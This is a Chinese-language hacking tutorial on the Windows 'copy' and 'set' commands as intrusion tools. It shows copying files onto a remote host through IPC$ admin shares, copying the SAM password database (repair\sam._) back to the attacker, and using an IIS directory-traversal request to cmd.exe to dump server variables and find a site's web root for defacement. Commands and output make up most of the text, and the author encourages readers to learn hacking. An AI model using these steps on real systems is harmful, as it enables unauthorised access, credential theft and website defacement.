黑客入侵命令—copy
下面我说说怎样把本地的文件复制到对方硬盘上去,需要建立好IPC$连接才有效。
这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下:
- copy index.htm \\127.0.0.1\c$\index.htm
- ----------------------
如果你要复制到D盘下把C改为D,就行了!
- copy index.htm \\127.0.0.1\d$\index.htm
- ----------------------
如果你要把他复制到WINNT目录里,就要把输入:
- copy index.htm \\127.0.0.1\admin$\index.htm
- admin$是winnt
- ----------------------
要把对方的文件复制过来,顺便告诉大家NT的备份的数据库放在x:\winnt\repair\sam._ sam._是数据库的文件名。
下面就把127.0.0.1的数据库复制到本地C盘下:
- copy \\127.0.0.1\admin$\repair\sam._ c:\
- ----------------------
黑客入侵命令—set
如果你跑进了一部机子,而且想黑他(这思想只能在特别时候才准有),当然他的80端口要开,不然你黑给谁看。这时需要用SET命令!下面是我得到的结果!我来分析它,只是找主页在那而已。
- COMPUTERNAME=PENTIUMII
- ComSpec=D:\WINNT\system32\cmd.EⅩE
- CONTENT_LENGTH=0
- GATEWAY_INTE**CE=CGI/1.1
- HTTP_ACCEPT=*/*
- HTTP_ACCEPT_LANGUAGE=zh-cn
- HTTP_CONNECTION=Keep-Alive
HTTP_HOST=当前登陆者的IP,这里本来是显示我的IP,被我删除了
- HTTP_ACCEPT_ENCODING=gzip, deflate
- HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)
- NUMBER_OF_PROCESSORS=1
- Os2LibPath=D:\WINNT\system32\os2\dll;
- OS=Windows_NT
- Path=D:\WINNT\system32;D:\WINNT
- PATHEXT=.COM;.EⅩE;.BAT;.CMD
- PATH_TRANSLATED=E:\vlroot主页放在的地址,只要你看到PATH_TRANSLATED=的后面就是主页的存放地址。这里是E:\vlroot
- PROCESSOR_ARCHITECTURE=x86
- PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel
- PROCESSOR_LEVEL=6
- PROCESSOR_REVISION=0303
- PROMPT=$P$G
- QUERY_STRING=/c+set
- REMOTE_ADDR=XX.XX.XX.XX
- REMOTE_HOST=XX.XX.XX.XX
- REQUEST_METHOD=GET
- script_NAME=/scripts/..%2f../winnt/system32/cmd.EⅩE
- SERVER_NAME=XX.XX.XX.XX
- SERVER_PORT=80
- SERVER_PORT_SECURE=0
- SERVER_PROTOCOL=HTTP/1.1
- SERVER_SOFTWARE=Microsoft-IIS/3.0对方使用IIS/3.0
- SystemDrive=D:
- SystemRoot=D:\WINNT
- TZ=GMT-9
- USERPROFILE=D:\WINNT\Profiles\Default User
- windir=D:\WINNT
粉红色的那行就是对方主页存放地址,这里告诉大家一个技巧,很笨的技巧啊,不过只能用这个方法才能100%的找到主页的名称,当你DIR这个目录时,一定会看到很多文件,你可以把所有文件在浏览器这样输入XX.XX.XX.XX/文件名,这样只要看到和XX.XX.XX.XX看到的也面一模一样,那么这就是主页的名称了。
copy和set命令是黑客学习历程中比较基础的命令,希望每一位想学习黑客技术的读者多多关注这方面的内容。
【编辑推荐】